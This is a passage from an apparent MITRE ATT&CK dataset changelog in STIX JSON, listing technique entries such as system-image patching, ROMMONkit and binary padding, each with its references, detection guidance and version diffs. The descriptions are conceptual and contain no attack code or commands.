Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/004", + "external_id": "T1578.004" + }, + { + "source_name": "Tech Republic - Restore AWS Snapshots", + "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", + "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/" + }, + { + "source_name": "Google - Restore Cloud Snapshot", + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", + "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Netskope" + ], + "x_mitre_data_sources": [ + "Instance: Instance Start", + "Instance: Instance Metadata", + "Instance: Instance Stop", + "Instance: Instance Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. 
To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:42.495000+00:00\", \"old_value\": \"2025-04-15 19:58:03.446000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0030: Instance (Instance Metadata)", + "DS0030: Instance (Instance Modification)", + "DS0030: Instance (Instance Start)", + "DS0030: Instance (Instance Stop)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:42:19.740000+00:00", + "modified": "2025-04-25 15:15:59.227000+00:00", + "name": "Modify System Image", + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. 
This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601", + "external_id": "T1601" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source. 
Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:59.227000+00:00\", \"old_value\": \"2025-04-15 19:58:57.683000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1043: Credential Access Protection", + "M1045: Code Signing", + "M1046: Boot Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:53:10.576000+00:00", + "modified": 
"2025-04-25 14:48:39.086000+00:00", + "name": "Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601/002", + "external_id": "T1601.002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. 
Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:39.086000+00:00\", \"old_value\": \"2025-04-15 19:59:24.391000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1043: Credential Access Protection", + "M1045: Code Signing", + "M1046: Boot Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:49:24.129000+00:00", + 
"modified": "2025-04-25 14:48:09.178000+00:00", + "name": "Patch System Image", + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. 
This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. 
However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601/001", + "external_id": "T1601.001" + }, + { + "source_name": "Killing the myth of Cisco IOS rootkits", + "description": "Sebastian 'topo' Mu\u00f1iz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.", + "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf" + }, + { + "source_name": "Killing IOS diversity myth", + "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.", + "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf" + }, + { + "source_name": "Cisco IOS Shellcode", + "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.", + "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf" + }, + { + "source_name": "Cisco IOS Forensics Developments", + "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.", + "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf" + }, + { + "source_name": "Juniper Netscreen of the Dead", + "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.", + "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). 
Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. 
(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:09.178000+00:00\", \"old_value\": \"2025-04-15 19:59:10.610000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1043: Credential Access Protection", + "M1045: Code Signing", + "M1046: Boot Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:15.935000+00:00", + "modified": "2025-04-25 15:15:50.032000+00:00", + "name": "Multi-Stage Channels", + "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. 
The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1104", + "external_id": "T1104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. 
Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:50.032000+00:00\", \"old_value\": \"2025-04-15 19:58:48.060000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 16:48:08.241000+00:00", + "modified": "2025-04-25 14:46:38.101000+00:00", + "name": "Network Address Translation Traversal", + "description": "Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. 
Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1599/001", + "external_id": "T1599.001" + }, + { + "source_name": "RFC1918", + "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. 
Retrieved October 20, 2020.", + "url": "https://tools.ietf.org/html/rfc1918" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device\u2019s configuration to determine if any unintended NAT rules have been added without authorization.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:38.101000+00:00\", \"old_value\": \"2025-04-15 19:58:30.055000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1037: Filter Network Traffic", + "M1043: Credential Access Protection" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": 
"attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-05 14:04:25.865000+00:00", + "modified": "2025-04-25 14:46:48.991000+00:00", + "name": "Binary Padding", + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/001", + "external_id": "T1027.001" + }, + { + "source_name": "ESET OceanLotus", + "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + }, + { + "source_name": "Securelist Malware Tricks April 2017", + "description": "Ishimaru, S.. (2017, April 13). 
Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", + "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/" + }, + { + "source_name": "VirusTotal FAQ", + "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", + "url": "https://www.virustotal.com/en/faq/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Martin Jirkal, ESET" + ], + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:48.991000+00:00\", \"old_value\": \"2025-04-16 20:37:17.215000+00:00\"}}}", + "previous_version": "1.3", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:28.471000+00:00", + "modified": "2025-04-25 15:15:22.038000+00:00", + "name": "Peripheral Device Discovery", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1120", + "external_id": "T1120" + }, + { + "source_name": "Peripheral Discovery Linux", + "description": "Shahriar Shovon. (2018, March). List USB Devices Linux. 
Retrieved March 11, 2022.", + "url": "https://linuxhint.com/list-usb-devices-linux/" + }, + { + "source_name": "Peripheral Discovery macOS", + "description": "SS64. (n.d.). system_profiler. Retrieved March 11, 2022.", + "url": "https://ss64.com/osx/system_profiler.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:22.038000+00:00\", \"old_value\": \"2025-04-16 20:37:16.397000+00:00\"}}}", + "previous_version": "1.4", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-20 00:05:48.790000+00:00", + "modified": "2025-04-25 14:47:36.549000+00:00", + "name": "ROMMONkit", + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. 
Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/004", + "external_id": "T1542.004" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. 
